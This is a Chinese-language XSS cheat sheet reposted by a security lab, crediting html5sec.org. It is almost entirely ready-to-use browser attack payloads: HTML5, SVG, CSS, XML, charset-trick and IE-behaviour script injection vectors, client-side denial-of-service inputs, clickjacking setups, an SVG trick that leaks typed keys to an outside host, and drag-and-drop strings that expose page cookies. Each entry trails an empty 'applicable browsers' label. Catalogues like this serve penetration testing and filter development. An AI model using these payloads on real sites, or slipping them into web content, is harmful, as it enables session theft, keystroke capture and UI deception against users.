XSS备忘录
HTML5特性向量
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>适用浏览器
<input onfocus=write(1) autofocus>适用浏览器
<input onblur=write(1) autofocus><input autofocus>适用浏览器
<video poster=javascript:alert(1)//></video>适用浏览器
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>适用浏览器
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>适用浏览器
<video><source onerror="alert(1)">适用浏览器
<video onerror="alert(1)"><source></source></video>适用浏览器
<form><button formaction="javascript:alert(1)">X</button>适用浏览器
<body oninput=alert(1)><input autofocus>适用浏览器
<math href="javascript:alert(1)">CLICKME</math>
<math>
<!-- up to FF 13 -->
<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
<!-- FF 14+ -->
<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction>
</math>适用浏览器
<form action="" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="injected" value="injected" dirname="password" />
<input type="submit">
</form>适用浏览器
<link rel="import" href="test.svg" />适用浏览器
<iframe srcdoc="<img src=x:x onerror=alert(1)>" />适用浏览器
<picture><source srcset="x"><img onerror="alert(1)"></picture>
<picture><img srcset="x" onerror="alert(1)"></picture>
<img srcset=",,,,,x" onerror="alert(1)">适用浏览器
<a href="//evil.com" target="_blank" rel="noreferrer">CLICK</a> // window.opener will be null
<map><area href="//evil.com" target="_blank" rel="noreferrer">CLICK</area></map> // window.opener will be null
<svg><a xlink:href="//evil.com" rel="noreferrer">CLICK</a></svg> // window.opener still works
<form action="//evil.com" target="_blank" rel="noreferrer"><input type="submit"></form>// window.opener still works
<form id="test" rel="noreferrer"></form><button form="test" formtarget="_blank" formaction="//evil.com">CLICKME</button>// window.opener still works
<math href="//evil.com" xlink:show="new" rel="noreferrer">CLICKME</math>// window.opener still works适用浏览器
<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe>
<a href="javascript:'<svg onload=alert(1)>⃒'">CLICK</a>适用浏览器
#Chrome, Opera, Safari and Edge
<div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div>
<div style="-webkit-user-modify:read-write" onfocus="alert(1)" id="xss">
<div style="-webkit-user-modify:read-write-plaintext-only" onfocus="alert(1)" id="xss">
# Firefox
<div onbeforescriptexecute="alert(1)"></div>
<script>1</script>
#MSIE10/11 & Edge
<div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="alert(1)">
#MSIE10
<div contenteditable onresize="alert(1)"></div>
# MSIE11
<div onactivate="alert(1)" id="xss" style="overflow:scroll"></div>
<div onfocus="alert(1)" id="xss" style="display:table">
<div id="xss" style="-ms-block-progression:bt" onfocus="alert(1)">
<div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="alert(1)">
<div id="xss" style="float:left" onfocus="alert(1)">
# Chrome, Opera, Safari
<style>@keyframes x{}</style>
<div style="animation-name:x" onanimationstart="alert(1)"></div>
# Chrome, Opera, Safari
<style>
div {width: 100px;}
div:target {width: 200px;}
</style>
<div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div>
# Safari
<div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>适用浏览器
<details open ontoggle="alert(1)">适用浏览器
<video src onratechange="alert(1)">适用浏览器
HTML4和一些老的向量
<frameset onload=alert(1)>适用浏览器
<table background="javascript:alert(1)"></table>适用浏览器
<!--<img src="--><img src=x onerror=alert(1)//">适用浏览器
<comment><img src="</comment><img src=x onerror=alert(1)//">适用浏览器
<!-- up to Opera 11.52, FF 3.6.28 -->
<![><img src="]><img src=x onerror=alert(1)//">
<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->
<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>适用浏览器
<style><img src="</style><img src=x onerror=alert(1)//">适用浏览器
<li style=list-style:url() onerror=alert(1)></li>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>适用浏览器
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>适用浏览器
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>适用浏览器
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>适用浏览器
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>适用浏览器
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<embed src="javascript:alert(1)"></embed> // Firefox only适用浏览器
<b <script>alert(1)//</script>0</script></b>适用浏览器
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>适用浏览器
<!-- IE 6-8 -->
<x '="foo"><x foo='><img src=x onerror=alert(1)//'>
<!-- IE 6-9 -->
<! '="foo"><x foo='><img src=x onerror=alert(2)//'>
<? '="foo"><x foo='><img src=x onerror=alert(3)//'>适用浏览器
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF
<img src="javascript:alert(2)">
<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓
<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓适用浏览器
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>适用浏览器
<object allowscriptaccess="always" data="test.swf"></object>适用浏览器
[A]
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
[B]
<? foo="><x foo='?><script>alert(1)</script>'>">
[C]
<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">
[D]
<% foo><x foo="%><script>alert(1)</script>">适用浏览器
<html>
<body>
<b>some content without two new line \n\n</b>
Content-Type: multipart/related; boundary="******"<b>some content without two new line</b>
--******
Content-Location: xss.html
Content-Transfer-Encoding: base64
PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1
cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9
dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy
YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg
--******--
</body>
</html>适用浏览器
<!-- IE 5-9 -->
<div id=d><x xmlns="><iframe onload=alert(1)"></div>
<script>d.innerHTML+='';</script>
<!-- IE 10 in IE5-9 Standards mode -->
<div id=d><x xmlns='"><iframe onload=alert(2)//'></div>
<script>d.innerHTML+='';</script>适用浏览器
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">适用浏览器
<a href="[a]java[b]script[c]:alert(1)">XXX</a>适用浏览器
<img src="x` `<script>alert(1)</script>"` `>适用浏览器
<img src onerror /" '"= alt=alert(1)//">适用浏览器
<title onpropertychange=alert(1)></title><title title=></title>适用浏览器
<!-- IE 5-8 standards mode -->
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">
<!-- IE 5-9 standards mode -->
<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">适用浏览器
<!--[if]><script>alert(1)</script -->
<!--[if<img src=x onerror=alert(2)//]> -->适用浏览器
<script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
<script src="\\example.com\foo.js"></script> // Safari 5.0适用浏览器
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>适用浏览器
<!-- `<img/src=xx:xx onerror=alert(1)//--!>适用浏览器
<xmp>
<%
</xmp>
<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>
<script>
x='<%'
</script> %>/
alert(2)
</script>
XXX
<style>
*['<!--']{}
</style>
-->{}
*{color:red}</style>适用浏览器
<frameset onpageshow="alert(1)">
<body onpageshow="alert(1)">适用浏览器
<applet onerror="alert(1)"></applet>适用浏览器
基于CSS注入的向量
<a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>适用浏览器
<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>适用浏览器
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d适用浏览器
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>适用浏览器
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>适用浏览器
<style>*[{}@import'test.css?]{color: green;}</style>X适用浏览器
<div style="font-family:'foo[a];color:red;';">XXX</div>适用浏览器
<div style="font-family:foo}color=red;">XXX</div>适用浏览器
<div style="[a]color[b]:[c]red">XXX</div>适用浏览器
<div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>适用浏览器
<// style=x:expression\28write(1)\29>适用浏览器
<style>*{x:expression(write(1))}</style>适用浏览器
<!-- Up to Opera 10.63 -->
<div style=content:url(test2.svg)></div>
<!-- Up to Opera 11.64 - see link below -->
<!-- Up to Opera 12.x -->
<div style="background:url(test5.svg)">PRESS ENTER</div><form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:alert(1)">
<!-- this file can be crossdomain if "action" attribute refers to an external file -->
<meta http-equiv="refresh" content="1;URL=test5.svg"/>
<input type="submit" autofocus="autofocus"/>
</form>适用浏览器
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>适用浏览器
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>适用浏览器
XXX<style>
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
<!--
--><!--*{color:red} /* all UA */
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
</style>适用浏览器
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>适用浏览器
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>适用浏览器
<div id="x">XXX</div>
<style>
#x{font-family:foo[bar;color:green;}
#y];color:red;{}
</style>适用浏览器
<x style="background:url('x[a];color:red;/*')">XXX</x>适用浏览器
纯javascript的向量
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>适用浏览器
<script>({0:#0=alert/#0#/#0#(0)})</script>适用浏览器
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>适用浏览器
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>适用浏览器
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>适用浏览器
<script>
alert`1`;
var something = `abc${alert(1)}def`;
``.constructor.constructor`alert\`1\````;
</script>适用浏览器
E4X向量
<script src="#">{alert(1)}</script>;1适用浏览器
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);适用浏览器
<b><script<b></b><alert(1)</script </b></b>适用浏览器
<script<{alert(1)}/></script </>适用浏览器
DOM属性与方法的攻击向量
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))适用浏览器
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>适用浏览器
基于JSON的向量
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>适用浏览器
SVG内的向量
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>适用浏览器
<?xml version="1.0" standalone="no"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
</style>
</head>
<body>Hello</body>
</html><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>适用浏览器
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg">
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a>
</svg>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<animation xlink:href="javascript:alert(1)"/>
<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/>
<foreignObject xlink:href="javascript:alert(1)"/>
<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
</svg>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg">
<set attributeName="onmouseover" to="alert(1)"/>
<animate attributeName="onunload" to="alert(1)"/>
</svg>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg">
<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>
</svg>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<feImage>
<set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
</feImage>
</svg>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg" id="foo">
<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/>
</svg>适用浏览器
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>
</svg><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<clipPath id="a" >
<set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:alert(1)" />
</clipPath>
<pattern id="b">
<set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:alert(2)" />
</pattern>
<filter id="c">
<set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:alert(3)" />
</filter>
<marker id="d">
<set xlink:href="#x" attributeName="xlink:href" begin="4s" to="javascript:alert(1)" />
</marker>
<mask id="e">
<set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:alert(2)" />
</mask>
<linearGradient id="f">
<set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:alert(3)" />
</linearGradient>
</svg>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg">
<path d="M0,0" style="marker-start:url(test4.svg#a)"/>
</svg><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0">
<a xlink:href="http://google.com">
<set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" />
<rect width="1000" height="1000" fill="white"/>
</a>
</marker>
</svg>适用浏览器
<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED>]>
<svg xmlns="http://www.w3.org/2000/svg">
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe>
</xsl:template>
</xsl:stylesheet>
<circle fill="red" r="40"></circle>
</svg>适用浏览器
<svg xmlns="http://www.w3.org/2000/svg" id="x">
<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
<handler id="y">alert(1)</handler>
</svg>适用浏览器
<svg><style><img/src=x onerror=alert(1)// </b>适用浏览器
<svg>
<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
<!--
Same effect with
<image filter='...'>
-->
</svg>适用浏览器
<!doctype html>
<form>
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
<br>
<input name="secret" type="password">
</form>
<!-- injection --><svg height="50px">
<image xmlns:xlink="http://www.w3.org/1999/xlink">
<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />
<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />
<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />
</image>
</svg>适用浏览器
<svg>
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?">
<circle r="400"></circle>
<animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
</a>适用浏览器
<svg><script>
alert`1`
<p>
<svg><script>
alert`1`
<p>适用浏览器
X(HT)ML相关向量
<?xml-stylesheet href="javascript:alert(1)"?><root/>适用浏览器
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>适用浏览器
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>适用浏览器
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>
<root/>适用浏览器
<!DOCTYPE x [
<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"
onerror CDATA "alert(1)"
onload CDATA "alert(2)">
]><img />适用浏览器
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml">
<html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>
</doc>适用浏览器
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>适用浏览器
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x><!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='alert(1)'/>">适用浏览器
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>适用浏览器
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/><?xml version="1.0"?>
<Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data">
<ElementType name="img">
<AttributeType name="src" required="yes" default="x"/>
<AttributeType name="onerror" required="yes" default="alert(1)"/>
<attribute type="src"/>
<attribute type="onerror"/>
</ElementType>
</Schema>适用浏览器
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>适用浏览器
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>适用浏览器
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>适用浏览器
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>适用浏览器
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/><script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>适用浏览器
<?xml-stylesheet type="text/xsl" href="#" ?>
<stylesheet xmlns="http://www.w3.org/TR/WD-xsl">
<template match="/">
<eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval>
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
</template>
</stylesheet>适用浏览器
UTF-7和其它诡异的编码集的向量
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi适用浏览器
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>适用浏览器
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾适用浏览器
客户端DOS向量
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>适用浏览器
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>适用浏览器
<input onblur=focus() autofocus><input>适用浏览器
HTML behavior和binding相关向量
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >适用浏览器
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>适用浏览器
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>适用浏览器
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe><xml>
<rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" />
</xml>适用浏览器
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>适用浏览器
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>适用浏览器
<x style="behavior:url(test.sct)"><SCRIPTLET>
<IMPLEMENTS Type="Behavior"></IMPLEMENTS>
<SCRIPT Language="javascript">alert(1)</SCRIPT>
</SCRIPTLET>适用浏览器
<xml id="xss" src="test.htc"></xml>
<label dataformatas="html" datasrc="#xss" datafld="payload"></label><?xml version="1.0"?>
<x>
<payload><![CDATA[<img src=x onerror=alert(1)>]]></payload>
</x>适用浏览器
<event-source src="event.php" onload="alert(1)"><?php
header("Content-Type: application/x-dom-event-stream");
die("Event: load\ndata: \n\n");
?>适用浏览器
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>适用浏览器
<div id="x">x</div>
<xml:namespace prefix="t">
<import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">适用浏览器
Clickjacking和UI Redressing的向量
<a href="http://attacker.org">
<iframe src="http://example.org/"></iframe>
</a>适用浏览器
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');">
<h1>Drop me</h1>
</div>
<iframe src="http://www.example.org/dropHere.html"></iframe>适用浏览器
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
<textarea type="text" cols="50" rows="10"></textarea>适用浏览器
<script>
function makePopups(){
for (i=1;i<6;i++) {
window.open('popup.html','spam'+i,'width=50,height=50');
}
}
</script>
<body>
<a href="#" onclick="makePopups()">Spam</a>适用浏览器
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:svg="http://www.w3.org/2000/svg">
<body style="background:gray">
<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>
<svg:svg>
<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">
<svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>
<svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>
</svg:mask>
</svg:svg>
</body>
</html>适用浏览器
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>适用浏览器
<span class=foo>Some text</span>
<a class=bar href="http://www.example.org">www.example.org</a>
<script src="http://code.jquery.com/jquery-1.4.4.js"></script>
<script>
$("span.foo").click(function() {
alert('foo');
$("a.bar").click();
});
$("a.bar").click(function() {
alert('bar');
location="http://html5sec.org";
});
</script>适用浏览器
<b>drag and drop one of the following strings to the drop box:</b>
<br/><hr/>
jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
<br/><hr/>
feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
<br/><hr/>
feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>
<br/><hr/>
feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//
<br/><hr/>
<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>适用浏览器
原文链接:http://www.html5sec.org
Ms08067安全实验室
专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。
团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。
官方网站:www.ms08067.com
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-01-20,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读